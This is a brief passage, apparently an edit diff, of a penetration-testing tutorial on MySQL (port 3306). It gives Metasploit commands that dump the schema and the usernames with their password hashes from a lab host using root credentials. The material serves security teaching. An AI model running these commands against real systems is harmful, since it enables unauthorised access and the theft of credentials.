Penetration Testing on MYSQL (Port 3306)

 use auxiliary/scanner/mysql/mysql_schemadump set rhosts 192.168.31.205 set username root set password 123 run

-To dump the usernames and password hashes, we can use the auxiliary/scanner/mysql/mysql_hashdump, it gives us the usernames and the password hashes as output.
+To dump usernames and password hashes, we can use the auxiliary/scanner/mysql/mysql_hashdump module.
+It outputs both usernames and their corresponding password hashes.

 use auxiliary/scanner/mysql/mysql_hashdump set rhosts 192.168.31.205 set username root set password 123 run